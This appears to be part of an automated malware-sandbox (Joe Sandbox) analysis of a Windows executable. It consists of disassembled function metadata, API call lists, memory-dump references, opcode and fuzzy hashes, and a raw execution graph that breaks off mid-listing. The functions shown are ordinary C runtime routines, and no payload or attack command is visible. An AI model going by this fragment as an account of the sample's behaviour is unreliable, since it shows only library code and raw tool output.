                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,001FC7DE,?,?,00000000,00000000,00000000,?), ref: 001FC8FD
                                                              • CatchIt.LIBVCRUNTIME ref: 001FC9E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: CatchEncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 1435073870-2084237596
                                                              • Opcode ID: 4e9f73c920b6bf5fbf3c6bd98277680e5754fbdd9e3286fd76468f205b2da612
                                                              • Instruction ID: 70e766fb775ac82ea3f65e86ac2ef8d6cbeb7a5d0b24fdb324b7272fb8c687ca
                                                              • Opcode Fuzzy Hash: 4e9f73c920b6bf5fbf3c6bd98277680e5754fbdd9e3286fd76468f205b2da612
                                                              • Instruction Fuzzy Hash: E1416A7190020DAFCF15DF98CE81AEEBBB5FF58304F198099FA08A7211D375A950EB91
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00203AED,?,?,9C2BD565,?,?,?,00203935,00000000,FlsAlloc,0020C824,0020C82C), ref: 00203A5E
                                                              • GetLastError.KERNEL32(?,00203AED,?,?,9C2BD565,?,?,?,00203935,00000000,FlsAlloc,0020C824,0020C82C,?,?,001FBBC1), ref: 00203A68
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?), ref: 00203A90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID: api-ms-
                                                              • API String ID: 3177248105-2084034818
                                                              • Opcode ID: 99a9ba2c857a2b1b58b722a020a479676f7ef447d3192fd73582618707ca1a3f
                                                              • Instruction ID: d489261f867343f9cd2b96e765e2bd6a54ab14751c4e13f28f67eaa673624d08
                                                              • Opcode Fuzzy Hash: 99a9ba2c857a2b1b58b722a020a479676f7ef447d3192fd73582618707ca1a3f
                                                              • Instruction Fuzzy Hash: C0E01231790307BBEB105F50EC0EB9C3A5DAB21B81F148021FA4CA44E2DBB199718684
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00204472
                                                                • Part of subcall function 0020177F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00203EB8,?,00000000,-00000008), ref: 002017E0
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002046C4
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0020470A
                                                              • GetLastError.KERNEL32 ref: 002047AD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                              • String ID:
                                                              • API String ID: 2112829910-0
                                                              • Opcode ID: 982c529239fcc42d752957d626d37abfcd68181fb065a36bb841b254a916fefb
                                                              • Instruction ID: 474fdaf177d491912a76729a45398bd707c291c242c58ea62064222a719cdede
                                                              • Opcode Fuzzy Hash: 982c529239fcc42d752957d626d37abfcd68181fb065a36bb841b254a916fefb
                                                              • Instruction Fuzzy Hash: 5CD18CB5D10258AFCB15DFA8D880AEDBBB5EF49304F24812AE515EB392D730A951CB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: d6d2c5abb3fe6a3300805ddf875bda53af8784694bfc48b3d0fafd1162c7df9f
                                                              • Instruction ID: 25523f4bb4af25343e0612b5bdd1fa146c7d29d4428de6f56dc4ffe93340189f
                                                              • Opcode Fuzzy Hash: d6d2c5abb3fe6a3300805ddf875bda53af8784694bfc48b3d0fafd1162c7df9f
                                                              • Instruction Fuzzy Hash: D051E572A0420EEFDB298F54DA51BBA77A4FF54750F14802DEA4587292D731EC90EBD0
                                                              APIs
                                                                • Part of subcall function 0020177F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00203EB8,?,00000000,-00000008), ref: 002017E0
                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00200ECB,?,?,?,00000000), ref: 00200B89
                                                              • __dosmaperr.LIBCMT ref: 00200B90
                                                              • GetLastError.KERNEL32(00000000,00200ECB,?,?,00000000,?,?,?,00000000,00000000,?,00200ECB,?,?,?,00000000), ref: 00200BCA
                                                              • __dosmaperr.LIBCMT ref: 00200BD1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 1913693674-0
                                                              • Opcode ID: f0b229236b61ce8ae19f11e073e5dba485064a43ea7c32037eda5b699ece0d85
                                                              • Instruction ID: 83075c85b41067b3e9aacc1bd67c6efb39de791135cd5fa92f09814ef37b434f
                                                              • Opcode Fuzzy Hash: f0b229236b61ce8ae19f11e073e5dba485064a43ea7c32037eda5b699ece0d85
                                                              • Instruction Fuzzy Hash: 67219871624706AFEB20AF6588C1E6BB7A9FF5036CF108529F91997193D770EC608B50
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: faeb12654ad50ae3fa778439832d25645dc5d73359098471b777a0323b5fd3a2
                                                              • Instruction ID: 41598626b9ff9801fa49adc3595bf943cda2f66de2e4647ac5b2d9ccfd7509e7
                                                              • Opcode Fuzzy Hash: faeb12654ad50ae3fa778439832d25645dc5d73359098471b777a0323b5fd3a2
                                                              • Instruction Fuzzy Hash: 8B212331620306BFDB24AF64CC81D6BB3AAEF003647108624FA59C7692DB30EC31CB90
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00201883
                                                                • Part of subcall function 0020177F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00203EB8,?,00000000,-00000008), ref: 002017E0
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002018BB
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002018DB
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 158306478-0
                                                              • Opcode ID: 6eb472d55a6a3d164163d109e807d4f12a2c8b08f5c873531baed474d02dc3b7
                                                              • Instruction ID: 579ea8b8a7b5e5474660073eff993a6e46270986fd4cd1a964473d06cd6f0955
                                                              • Opcode Fuzzy Hash: 6eb472d55a6a3d164163d109e807d4f12a2c8b08f5c873531baed474d02dc3b7
                                                              • Instruction Fuzzy Hash: C211C4B652171EBEE7212BB15C8DCBF6AACDE553987100124F601D2152EF708E3245B1
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,0020838E,00000000,00000001,?,?,?,00204801,?,00000000,00000000), ref: 00209432
                                                              • GetLastError.KERNEL32(?,0020838E,00000000,00000001,?,?,?,00204801,?,00000000,00000000,?,?,?,00204147,?), ref: 0020943E
                                                                • Part of subcall function 00209490: CloseHandle.KERNEL32(FFFFFFFE,0020944E,?,0020838E,00000000,00000001,?,?,?,00204801,?,00000000,00000000,?,?), ref: 002094A0
                                                              • ___initconout.LIBCMT ref: 0020944E
                                                                • Part of subcall function 00209470: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0020940C,0020837B,?,?,00204801,?,00000000,00000000,?), ref: 00209483
                                                              • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,0020838E,00000000,00000001,?,?,?,00204801,?,00000000,00000000,?), ref: 00209463
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: 29c1ce1defe32ce83b69c737ea4f81ac15cdd1ca01563f4b8ef969d926deac47
                                                              • Instruction ID: 5996d3e0adb3c8d94a004a71793b4c36a6dbe23cd04e64c8d65e44ec51da32f9
                                                              • Opcode Fuzzy Hash: 29c1ce1defe32ce83b69c737ea4f81ac15cdd1ca01563f4b8ef969d926deac47
                                                              • Instruction Fuzzy Hash: 24F0AC36510259BBCF225FA5EC0CAD93F67FF183A1B158110FA1995172CA328971DB91
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 001FC155
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ___except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3493665558-3733052814
                                                              • Opcode ID: 213d7425d84640b4298180d6770058ac37cf87002bf707635e688a450808493e
                                                              • Instruction ID: 9f2d642420871e1a6dd93d231a555c783efac28036c81bd0bf779cbd4644c196
                                                              • Opcode Fuzzy Hash: 213d7425d84640b4298180d6770058ac37cf87002bf707635e688a450808493e
                                                              • Instruction Fuzzy Hash: 5631D17240021DDBCF268F94DE848BABB76FF09315B18855AFA5849122D332DCA1EBC1
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001F55D3
                                                              • ___raise_securityfailure.LIBCMT ref: 001F56BB
                                                                • Part of subcall function 001F664C: RaiseException.KERNEL32(E06D7363,00000001,00000003,001F55C7,?,?,?,?,001F55C7,?,0021265C), ref: 001F66AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                              • String ID: E!
                                                              • API String ID: 3749517692-107689196
                                                              • Opcode ID: dac087c34ff7576d5e00bfcd85bee8d786dc332cfe85a28ccb94a7ead3e0404a
                                                              • Instruction ID: 2da173a89ab42ee786d4a2cd5babeda522736d9b11b80612cc9a42c152e95e72
                                                              • Opcode Fuzzy Hash: dac087c34ff7576d5e00bfcd85bee8d786dc332cfe85a28ccb94a7ead3e0404a
                                                              • Instruction Fuzzy Hash: 4C313EB4501348ABD704EF64FC49AD57BB9BB39718F50C12AEA0CC72B1EB709645CB84
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001F55D3
                                                              • ___raise_securityfailure.LIBCMT ref: 001F56BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                              • String ID: E!
                                                              • API String ID: 3761405300-107689196
                                                              • Opcode ID: 908abb6f71459b64a90750780b2ab63d7c38c05408fb0b8e0d415393145eece0
                                                              • Instruction ID: deacf76a3bd23547dc13c7796ed6b05f6a1823af45ab754a53bc19cdaa4943f3
                                                              • Opcode Fuzzy Hash: 908abb6f71459b64a90750780b2ab63d7c38c05408fb0b8e0d415393145eece0
                                                              • Instruction Fuzzy Hash: 9A21E4B4501344EBD710EF55F889A947BEABB7A719F50C12AEA0CCB3A0EBB055418F48

                                                              Execution Graph

                                                              Execution Coverage:8.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:54
                                                              execution_graph 20129 401047 20132 4076cb 20129->20132 20135 40769e 20132->20135 20136 4076b4 20135->20136 20137 4076ad 20135->20137 20144 413230 20136->20144 20141 4131b3 20137->20141 20140 40104c 20142 413230 44 API calls 20141->20142 20143 4131c5 20142->20143 20143->20140 20147 412f7c 20144->20147 20148 412f88 __FrameHandler3::FrameUnwindToState 20147->20148 20155 40e0c6 EnterCriticalSection 20148->20155 20150 412f96 20156 412fd7 20150->20156 20152 412fa3 20166 412fcb 20152->20166 20155->20150 20157 412ff2 20156->20157 20158 413065 std::_Locinfo::_Locinfo_ctor 20156->20158 20157->20158 20159 413045 20157->20159 20169 41ef6b 20157->20169 20158->20152 20159->20158 20160 41ef6b 44 API calls 20159->20160 20162 41305b 20160->20162 20164 4140f1 ___free_lconv_mon 14 API calls 20162->20164 20163 41303b 20165 4140f1 ___free_lconv_mon 14 API calls 20163->20165 20164->20158 20165->20159 20197 40e10e LeaveCriticalSection 20166->20197 20168 412fb4 20168->20140 20170 41ef78 20169->20170 20171 41ef93 20169->20171 20170->20171 20172 41ef84 20170->20172 20174 41efa2 20171->20174 20178 4239f1 20171->20178 20175 40e072 __dosmaperr 14 API calls 20172->20175 20185 419c05 20174->20185 20177 41ef89 codecvt 20175->20177 20177->20163 20179 423a11 HeapSize 20178->20179 20180 4239fc 20178->20180 20179->20174 20181 40e072 __dosmaperr 14 API calls 20180->20181 20182 423a01 20181->20182 20183 40df74 ___std_exception_copy 41 API calls 20182->20183 20184 423a0c 20183->20184 20184->20174 20186 419c12 20185->20186 20187 419c1d 20185->20187 20188 415426 std::_Locinfo::_Locinfo_ctor 15 API calls 20186->20188 20189 419c25 20187->20189 20195 419c2e __Getctype 20187->20195 20193 419c1a 20188->20193 20190 4140f1 ___free_lconv_mon 14 API calls 20189->20190 20190->20193 20191 419c33 20194 40e072 __dosmaperr 14 API calls 20191->20194 20192 419c58 HeapReAlloc 20192->20193 20192->20195 20193->20177 20194->20193 20195->20191 20195->20192 20196 412e98 std::_Facet_Register 2 API calls 20195->20196 20196->20195 20197->20168 21497 414b46 21498 414b52 __FrameHandler3::FrameUnwindToState 21497->21498 21509 40e0c6 EnterCriticalSection 21498->21509 21500 414b59 21510 41c915 21500->21510 21503 414b77 21529 414b9d 21503->21529 21508 414a96 2 API calls 21508->21503 21509->21500 21511 41c921 __FrameHandler3::FrameUnwindToState 21510->21511 21512 41c94b 21511->21512 21513 41c92a 21511->21513 21532 40e0c6 EnterCriticalSection 21512->21532 21514 40e072 __dosmaperr 14 API calls 21513->21514 21516 41c92f 21514->21516 21517 40df74 ___std_exception_copy 41 API calls 21516->21517 21519 414b68 21517->21519 21518 41c983 21533 41c9aa 21518->21533 21519->21503 21523 4149e0 GetStartupInfoW 21519->21523 21521 41c865 __wsopen_s 15 API calls 21522 41c957 21521->21522 21522->21518 21522->21521 21524 414a91 21523->21524 21525 4149fd 21523->21525 21524->21508 21525->21524 21526 41c915 42 API calls 21525->21526 21527 414a25 21526->21527 21527->21524 21528 414a55 GetFileType 21527->21528 21528->21527 21537 40e10e LeaveCriticalSection 21529->21537 21531 414b88 21532->21522 21536 40e10e LeaveCriticalSection 21533->21536 21535 41c9b1 21535->21519 21536->21535 21537->21531 20283 406464 20284 406485 20283->20284 20288 406489 20283->20288 20285 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20284->20285 20286 4064f1 20285->20286 20288->20284 20289 40653f 20288->20289 20290 4064cd 20288->20290 20289->20284 20291 40dcfa 69 API calls 20289->20291 20290->20284 20292 4059eb 20290->20292 20291->20284 20295 40e7fb 20292->20295 20296 40e80e _Fputc 20295->20296 20301 40e5ff 20296->20301 20299 40bbd5 _Fputc 41 API calls 20300 4059f9 20299->20300 20300->20284 20302 40e60b __FrameHandler3::FrameUnwindToState 20301->20302 20303 40e612 20302->20303 20304 40e637 20302->20304 20305 40def7 _Fputc 41 API calls 20303->20305 20312 40bb65 EnterCriticalSection 20304->20312 20308 40e62d 20305->20308 20307 40e646 20313 40e6c3 20307->20313 20308->20299 20312->20307 20314 40e6fa 20313->20314 20334 40e6e8 _Fputc 20313->20334 20315 414bd2 _Ungetc 41 API calls 20314->20315 20316 40e701 20315->20316 20317 414bd2 _Ungetc 41 API calls 20316->20317 20328 40e729 20316->20328 20319 40e712 20317->20319 20318 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20320 40e657 20318->20320 20321 414bd2 _Ungetc 41 API calls 20319->20321 20319->20328 20335 40e687 20320->20335 20323 40e71e 20321->20323 20322 414bd2 _Ungetc 41 API calls 20324 40e75c 20322->20324 20326 414bd2 _Ungetc 41 API calls 20323->20326 20325 40e77f 20324->20325 20327 414bd2 _Ungetc 41 API calls 20324->20327 20330 41607a _Fputc 43 API calls 20325->20330 20325->20334 20326->20328 20329 40e768 20327->20329 20328->20322 20328->20334 20329->20325 20331 414bd2 _Ungetc 41 API calls 20329->20331 20330->20334 20332 40e774 20331->20332 20333 414bd2 _Ungetc 41 API calls 20332->20333 20333->20325 20334->20318 20338 40bb79 LeaveCriticalSection 20335->20338 20337 40e68d 20337->20308 20338->20337 21816 40657c 21817 406597 21816->21817 21819 4065a9 21817->21819 21820 405a08 21817->21820 21823 40ea6d 21820->21823 21824 40ea79 __FrameHandler3::FrameUnwindToState 21823->21824 21825 40ea80 21824->21825 21826 40ea97 21824->21826 21827 40e072 __dosmaperr 14 API calls 21825->21827 21836 40bb65 EnterCriticalSection 21826->21836 21829 40ea85 21827->21829 21831 40df74 ___std_exception_copy 41 API calls 21829->21831 21830 40eaa6 21837 40e9b7 21830->21837 21833 405a1a 21831->21833 21833->21819 21834 40eab4 21851 40eae3 21834->21851 21836->21830 21838 40e9cd 21837->21838 21844 40ea57 _Ungetc 21837->21844 21839 40e9fb 21838->21839 21840 418105 _Ungetc 14 API calls 21838->21840 21838->21844 21841 414bd2 _Ungetc 41 API calls 21839->21841 21839->21844 21840->21839 21842 40ea0d 21841->21842 21843 40ea30 21842->21843 21845 414bd2 _Ungetc 41 API calls 21842->21845 21843->21844 21854 40e8aa 21843->21854 21844->21834 21846 40ea19 21845->21846 21846->21843 21848 414bd2 _Ungetc 41 API calls 21846->21848 21849 40ea25 21848->21849 21850 414bd2 _Ungetc 41 API calls 21849->21850 21850->21843 21873 40bb79 LeaveCriticalSection 21851->21873 21853 40eae9 21853->21833 21855 414bd2 _Ungetc 41 API calls 21854->21855 21856 40e8cd 21855->21856 21857 414bd2 _Ungetc 41 API calls 21856->21857 21864 40e8f6 21856->21864 21858 40e8db 21857->21858 21860 414bd2 _Ungetc 41 API calls 21858->21860 21858->21864 21862 40e8e9 21860->21862 21861 40e930 21865 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21861->21865 21863 414bd2 _Ungetc 41 API calls 21862->21863 21863->21864 21864->21861 21867 4161e4 21864->21867 21866 40e9ae 21865->21866 21866->21844 21868 4161f7 _Fputc 21867->21868 21869 41607a _Fputc 43 API calls 21868->21869 21870 41620c 21869->21870 21871 40bbd5 _Fputc 41 API calls 21870->21871 21872 416219 21871->21872 21872->21861 21873->21853 20455 415002 20456 41500d 20455->20456 20457 41501d 20455->20457 20461 415023 20456->20461 20460 4140f1 ___free_lconv_mon 14 API calls 20460->20457 20462 41503e 20461->20462 20463 415038 20461->20463 20465 4140f1 ___free_lconv_mon 14 API calls 20462->20465 20464 4140f1 ___free_lconv_mon 14 API calls 20463->20464 20464->20462 20466 41504a 20465->20466 20467 4140f1 ___free_lconv_mon 14 API calls 20466->20467 20468 415055 20467->20468 20469 4140f1 ___free_lconv_mon 14 API calls 20468->20469 20470 415060 20469->20470 20471 4140f1 ___free_lconv_mon 14 API calls 20470->20471 20472 41506b 20471->20472 20473 4140f1 ___free_lconv_mon 14 API calls 20472->20473 20474 415076 20473->20474 20475 4140f1 ___free_lconv_mon 14 API calls 20474->20475 20476 415081 20475->20476 20477 4140f1 ___free_lconv_mon 14 API calls 20476->20477 20478 41508c 20477->20478 20479 4140f1 ___free_lconv_mon 14 API calls 20478->20479 20480 415097 20479->20480 20481 4140f1 ___free_lconv_mon 14 API calls 20480->20481 20482 4150a5 20481->20482 20487 414e4f 20482->20487 20488 414e5b __FrameHandler3::FrameUnwindToState 20487->20488 20503 40e0c6 EnterCriticalSection 20488->20503 20490 414e8f 20504 414eae 20490->20504 20492 414e65 20492->20490 20494 4140f1 ___free_lconv_mon 14 API calls 20492->20494 20494->20490 20495 414eba 20496 414ec6 __FrameHandler3::FrameUnwindToState 20495->20496 20508 40e0c6 EnterCriticalSection 20496->20508 20498 414ed0 20499 4150f0 __Getctype 14 API calls 20498->20499 20500 414ee3 20499->20500 20509 414f03 20500->20509 20503->20492 20507 40e10e LeaveCriticalSection 20504->20507 20506 414e9c 20506->20495 20507->20506 20508->20498 20512 40e10e LeaveCriticalSection 20509->20512 20511 414ef1 20511->20460 20512->20511 20548 40660e 20549 406622 20548->20549 20555 40667d 20549->20555 20556 405e65 20549->20556 20552 40666a 20552->20555 20568 40efa7 20552->20568 20559 405e80 20556->20559 20560 405ed1 20556->20560 20557 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20558 405ee9 20557->20558 20558->20552 20558->20555 20562 40f318 20558->20562 20559->20560 20561 40dcfa 69 API calls 20559->20561 20560->20557 20561->20560 20563 40f32b _Fputc 20562->20563 20582 40f0b7 20563->20582 20566 40bbd5 _Fputc 41 API calls 20567 40f34d 20566->20567 20567->20552 20569 